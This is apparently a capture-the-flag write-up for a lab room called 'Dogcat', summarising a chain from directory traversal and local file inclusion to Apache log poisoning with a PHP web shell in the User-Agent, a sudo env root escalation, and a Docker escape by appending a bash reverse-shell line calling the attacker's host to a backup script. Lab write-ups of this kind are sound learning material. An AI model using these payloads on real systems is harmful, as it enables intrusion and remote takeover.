# Dogcat

It took me a few tries to get the hang of this room, even after looking at other walkthroughs; instead of detailing each step as much as my previous writeups, I'll briefly summarize the key points to highlight what I learned, without my unsuccessful attempts.

- After realizing that the website is susceptible to directory traversal by experimenting with `../` in the URL and seeing some PHP warnings, we can try to retrieve the source code.
  - If we simply try to `/?view=dog../index`, we get function redeclaration errors, so we need a way to transport the source code without PHP rendering/executing it.
  - For this task, we can use a base64 PHP filter like so: `http://<ip>/?view=php://filter/convert.base64-encode/resource=dog/../index`
- By reading the source code, we see that there is a GET variable for the file extension added to our requested file (which we can control by appending `&ext=<extension of choice>`)
  - By adding `&ext=` to our query string in the URL, we can serve ANY file, not just those that end in .php.
- At this point we have a way to read files, but it would be great to leverage this vulnerability to gain further access.
- If we view the Apache web server access log (`http://<ip>/?view=dog/../../../../../var/log/apache2/access.log&ext=`), we have the opportunity to execute arbitrary code; we send a request with chosen text, it's appended to the Apache log, and because we're viewing the log from the PHP server, any PHP in that text will be executed.
- We notice that our User-Agent isn't URL encoded in our request, so we can provide any text to it and it will show up exactly the same when we request the log page.
  - With `curl` or Burp Suite, make an HTTP request and change the User-Agent to something like `<?php system($_GET['rce']);?>` to create a new PHP variable called `rce` which can be set in our URL query string.
  - Now we can assert that we have RCE by requesting the log again and appending our chosen text to the end, like this example which runs `ls` on the target machine: `http://<ip>/?view=dog/../../../../../var/log/apache2/access.log&ext=&rce=ls`
  - We can use this realization to copy a PHP reverse shell to the target machine, and then activate that shell by making a request to `http://<ip>/shell`.
- Now with a bit of poking around within /var/www, we find the first 2 flags.
- Looking for an opportunity to escalate privileges, `sudo -l` informs us that we can run /usr/bin/env as root without a password...
  - run `sudo env /bin/sh` to obtain root.
  - Find flag3 in /root
- Lastly, we realize that we're in a docker container and need to escape to the host machine to obtain the final flag.
- In /opt/backups there is a `backups.sh` script, and we can modify this to start a new reverse shell from the host machine.
  - `echo "bash -i >& /dev/tcp/<attacking ip>/443 0>&1" >> backup.sh` and start a nc listener on the attacking machine.
  - We receive a connection and find the final flag in the working directory.

# Closing thoughts
Although initial access was pretty challenging for me, it was great to learn more about how to actually exploit directory traversal / local file inclusion to get a shell.

Otherwise, it's good to get more practice with the same formula of simple privilege escalation and post-exploitation finding flags.